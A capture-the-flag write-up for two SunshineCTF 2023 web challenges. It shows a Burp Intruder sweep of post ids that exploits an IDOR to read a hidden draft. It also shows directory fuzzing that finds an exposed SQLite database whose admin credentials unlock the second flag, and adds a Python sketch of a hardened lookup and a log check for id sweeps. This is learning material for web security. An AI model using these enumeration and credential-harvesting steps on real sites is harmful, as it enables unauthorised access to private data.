Challenge 1: BeepBoop Blog
A few robots got together and started a blog! It’s full of posts that make absolutely no sense, but a little birdie told me that one of them left a secret in their drafts. Can you find it? https://beepboop.web.2023.sunshinectf.games
Intro
The challenge page is a blog that contains multiple posts from different robots.
We are a bunch of robots who like posting! We are chronically online, and our posts are not coherent. Enjoy our posts!
Solve
1. Click on a post, capture the request in Burp Suite and look at the response:
{"hidden":false,"post":"Their history, surface. subterranean. Hosting rights demography, women, labour, and urban sectors.. (opened 2003 now celebrated. Several leftist 30,000 people, mostly in the bahamas. other popular sports. Of walter's or severely cold winter. Urbanized areas achievements are an estimated 7,000. Natalie zemon or vegan cat foods have been separated out. in 1874.. Divisions, and power plants.. Press (the chinatown. many of montana's smaller. Festival (iiff) form which emerged from the. Gradually closed 1606, which granted land to. Educational goals be 'prepared for luck' in the lower mandible crushes the. In lone disease by increasing.","user":"Robot #420"}
2. Send the request to Intruder:
- Add a payload position on the post number
- Payloads: numbers from 0 to 1000, step 1
- Add "hidden":true under Options > Grep-Match
- Set the attack type to Sniper and start the attack
GET /post/§0§/ HTTP/1.1
Host: beepboop.web.2023.sunshinectf.games
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://beepboop.web.2023.sunshinectf.games/
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
3. Request 608 returned the flag:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 09 Oct 2023 17:36:58 GMT
Content-Type: application/json
Content-Length: 66
Connection: close
{"hidden":true,"post":"sun{wh00ps_4ll_IDOR}","user":"Robot #000"}
Solution
Bug: IDOR
Flag: sun{wh00ps_4ll_IDOR}
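As an added example (not code from the writeup or the challenge), a toy model of the /post/<id>/ lookup in Python: the vulnerable version beside a hardened one that serves drafts only to their author, plus a check over access-log lines for the id sweep an Intruder run leaves behind. The post rows, user names, IPs and log lines are constructed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass
class Post:
    post_id: int
    user: str
    text: str
    hidden: bool  # True for an unpublished draft

# Constructed rows modelled on the writeup; post 608 is the draft holding the flag.
POSTS = {
    0: Post(0, "Robot #420", "Their history, surface. subterranean.", False),
    608: Post(608, "Robot #000", "sun{wh00ps_4ll_IDOR}", True),
}

def vulnerable_get_post(post_id):
    """As on the challenge: the id alone selects the row, drafts included."""
    p = POSTS.get(post_id)
    return None if p is None else {"hidden": p.hidden, "post": p.text, "user": p.user}

def hardened_get_post(post_id, requester):
    """A draft is served only to its author (requester = authenticated user name,
    None for anonymous). Everyone else gets the same None as for a missing id,
    so a sweep of ids cannot tell a draft from a non-existent post."""
    p = POSTS.get(post_id)
    if p is None or (p.hidden and requester != p.user):
        return None
    return {"hidden": p.hidden, "post": p.text, "user": p.user}

# Detection side: nginx-style access lines, one "GET /post/<id>/" each.
LOG_RE = re.compile(r'^(\S+) .*"GET /post/(\d+)/ HTTP')

def sweep_suspects(log_lines, min_distinct_ids=50):
    """Clients that fetched at least min_distinct_ids different post ids,
    the footprint a 0..1000 Intruder run leaves in the access log."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return sorted(ip for ip, ids in seen.items() if len(ids) >= min_distinct_ids)

# Constructed log: one reader fetches two posts, another client walks ids 0..99.
_FMT = '%s - - [09/Oct/2023:17:36:58 +0000] "GET /post/%d/ HTTP/1.1" 200 66'
SAMPLE_LOG = [_FMT % ("203.0.113.5", i) for i in (3, 7)]
SAMPLE_LOG += [_FMT % ("198.51.100.9", i) for i in range(100)]
```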
Challenge 2: Hotdog Stand
In the not-so-distant future, robots have taken over the fast-food industry. Infiltrate the robot hotdog stand to find out what jobs still remain. https://hotdog.web.2023.sunshinectf.games
Intro
This challenge shows a login page with the following content and asks for a Robot ID and Access Code to get access.
Robot HotDog Stand Welcome, robot! Authenticate to access the exclusive robot menu. Humans, this interface isn’t for you!
Solve
1. At first I thought it was an auth bypass bug and tried SQLi payloads, but got no result.
2. As a first recon step, I fuzzed endpoints on the URL using dirsearch and found /robots.txt
3. /robots.txt contains:
User-agent: *
Disallow: /configs/
Disallow: /backups/
Disallow: /hotdog-database/
4. Found juicy endpoints: /configs/, /backups/, /hotdog-database/
5. Requesting the /hotdog-database/ endpoint returned a robot_data.db file for download.
Solution
1. Open the robot_data.db file in SQLite Viewer
2. Go to the credentials table; it contains:
id: 1, username: hotdogstand, password: slicedpicklesandonions, role: admin
3. Log in with the above credentials to get the flag.
Flag: sun{5l1c3d_p1cKl35_4nd_0N10N2}